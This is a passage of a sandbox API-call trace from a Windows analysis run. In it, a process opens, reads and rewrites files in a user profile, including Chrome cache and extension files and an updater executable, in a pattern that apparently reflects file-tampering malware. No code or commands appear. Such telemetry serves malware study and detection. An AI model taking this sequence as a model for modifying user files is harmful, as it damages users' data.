HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0162.473] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.473] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1144e0 [0162.473] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.473] ReleaseMutex (hMutex=0x168) returned 1 [0162.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GoogleUpdateSetup.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0162.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GoogleUpdateSetup.exe", cchWideChar=21, lpMultiByteStr=0x1f88d34, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GoogleUpdateSetup.exe", lpUsedDefaultChar=0x0) returned 21 [0162.473] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0162.474] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d0fb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3d0fb28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.474] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1134e0 [0162.474] ReadFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.474] CloseHandle (hObject=0x1e4) returned 1 [0162.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0162.475] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.475] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x42000 [0162.475] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0162.475] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.475] ReleaseMutex (hMutex=0x168) returned 1 [0162.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_1", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0162.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_1", cchWideChar=6, lpMultiByteStr=0x1f7ad44, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="data_1", lpUsedDefaultChar=0x0) returned 6 [0162.475] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0162.482] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x41000 [0162.482] ReadFile (in: hFile=0x1e4, lpBuffer=0x25adba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25adba8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0162.483] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x41000 [0162.483] WriteFile (in: hFile=0x1e4, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0163.467] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0163.467] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d0e028*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d0e028*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0163.467] CloseHandle (hObject=0x1e4) returned 1 [0164.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.128] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.128] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa7 [0164.129] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.129] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.129] ReleaseMutex (hMutex=0x168) returned 1 [0164.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0164.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x1f7ad74, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOG", lpUsedDefaultChar=0x0) returned 3 [0164.129] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xa7, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x2d5f2bc*=0xa7, lpOverlapped=0x0) returned 1 [0164.130] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.131] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x62f, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x62f, lpOverlapped=0x0) returned 1 [0164.968] CloseHandle (hObject=0x20c) returned 1 [0164.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.969] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.969] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd2c [0164.969] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.970] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.970] ReleaseMutex (hMutex=0x168) returned 1 [0164.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_128.png", lpUsedDefaultChar=0x0) returned 12 [0164.970] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xd2c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f2bc*=0xd2c, lpOverlapped=0x0) returned 1 [0164.972] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.972] WriteFile (in: hFile=0x20c, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x12b4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x12b4, lpOverlapped=0x0) returned 1 [0164.973] CloseHandle (hObject=0x20c) returned 1 [0164.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.974] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.974] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe0 [0164.974] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.974] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.974] ReleaseMutex (hMutex=0x168) returned 1 [0164.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.975] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0164.976] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.976] WriteFile (in: hFile=0x20c, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x668, lpOverlapped=0x0) returned 1 [0164.976] CloseHandle (hObject=0x20c) returned 1 [0164.976] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.977] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.977] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd6 [0164.978] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.978] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.978] ReleaseMutex (hMutex=0x168) returned 1 [0164.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.978] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xd6, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xd6, lpOverlapped=0x0) returned 1 [0164.979] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.979] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x65e, lpOverlapped=0x0) returned 1 [0164.980] CloseHandle (hObject=0x20c) returned 1 [0164.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.986] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.986] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xdd [0164.986] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.986] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.986] ReleaseMutex (hMutex=0x168) returned 1 [0164.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.987] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0164.988] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.988] WriteFile (in: hFile=0x20c, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x665, lpOverlapped=0x0) returned 1 [0164.988] CloseHandle (hObject=0x20c) returned 1 [0164.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.990] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.990] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd9 [0164.990] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.990] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.990] ReleaseMutex (hMutex=0x168) returned 1 [0164.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.990] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0164.992] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.992] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x661, lpOverlapped=0x0) returned 1 [0164.992] CloseHandle (hObject=0x20c) returned 1 [0164.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe2 [0164.993] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.994] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.994] ReleaseMutex (hMutex=0x168) returned 1 [0164.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.994] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0164.995] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0164.995] WriteFile (in: hFile=0x20c, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0164.995] CloseHandle (hObject=0x20c) returned 1 [0164.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0164.996] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.996] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2b56 [0164.996] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0164.996] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.996] ReleaseMutex (hMutex=0x168) returned 1 [0164.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 